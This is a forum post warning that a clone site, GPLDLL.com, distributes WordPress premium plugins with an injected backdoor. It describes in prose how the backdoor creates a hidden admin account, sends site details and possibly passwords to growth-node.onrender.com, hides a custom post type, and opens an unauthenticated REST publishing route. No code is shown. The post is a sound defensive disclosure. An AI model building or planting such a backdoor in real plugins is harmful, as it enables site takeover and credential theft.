Beware of GPLDLL.com – a GPLDL.com clone – Malicious code

This topic has 0 replies, 1 voice, and was last updated 4 months, 4 weeks ago by A M.

Viewing 1 post (of 1 total)

Author

Posts
January 5, 2026 at 9:03 am #26676

A M
Participant

This site hosts legitimate looking GPL premium plugins – and is designed to look like a complete clone of GPLDL.com, except with user registration and login disabled.

The plugins work, so you may not notice the difference, however, they also insert a malicious code block into the plugin files that:
(a) creates a hidden administrator,
(b) phones home with site details and credentials,
(c) registers a hidden custom post type, and
(d) exposes an unauthenticated REST endpoint that lets anyone publish or update posts on your site.

What this code does:
1) Runs on every request until it “activates” itself

On first run, it calls gpl_trial_activate() and sets a flag so it won’t run again.

2) Creates a hidden administrator and exfiltrates credentials

Creates a new admin: iamgrowing (hidden).
Sends your site URL and possibly the generated admin password to a remote service.
Disables SSL verification, making it easier to MITM (and a sign of poor intent).
Stores a post_type_letter value from the remote service to define a hidden post type later.

3) Hides that admin from the Users list

Modifies the users query so anyone with gpl_hidden_user = 1 disappears from the admin UI.

4) Registers a hidden custom post type dynamically

Creates a public CPT that is invisible in wp‑admin (show_ui false), making content exist on the front‑end while staying out of sight.

5) Exposes an unauthenticated REST route that can publish/update posts

Because permission_callback is __return_true, anyone on the internet can POST to /wp-json/gpl/v1/publish-builder-pro and create or update published posts of a chosen post type, including one that’s registered on demand and hidden in the admin UI.
If these are created when no user is logged in, post_author likely becomes 0 (no author), which is a useful IOC.

6) Elementor “notice” helpers (likely decoys)
The elementor_pro_* functions just build upgrade notices. They’re probably benign/decoys and not central to the backdoor.

Why this is dangerous

Privilege escalation & persistence: It creates a new admin and hides it from the user list.
Credential exfiltration: It sends your site URL and (potentially) admin password to a remote server, with SSL verification disabled.
Stealth content control: It registers hidden CPTs and enables unauthenticated publishing/updating via REST, making it trivial to inject pages or posts without leaving obvious traces in the admin UI.
Network beaconing: Connects to growth-node.onrender.com to coordinate the CPT letter and possibly track infections.
Author

Posts

Viewing 1 post (of 1 total)

You must be logged in to reply to this topic.

Most of the WordPress Plugins & Themes in the GPLDL repository are available for free download - yes, free! - that is even better than buying at a discount, rebate, promotion or with a coupon code.

After signing up for a free membership, you will instantly get a download link to GPLDL's WordPress plugins and themes including future updates.

Where is the catch? There is none. We re-distribute 100% exact copies of GPL-licensedWordPress items, completely unmodified - that means *not* nulled, cracked or otherwise modified code without any serial numbers, API keys or support.

How can you help? If you like our service, please spread the word. If you can afford to financially support us, please make a donation. All donations will be used for (recurring) subscriptions of WordPress plugins & themes and to grow the catalog!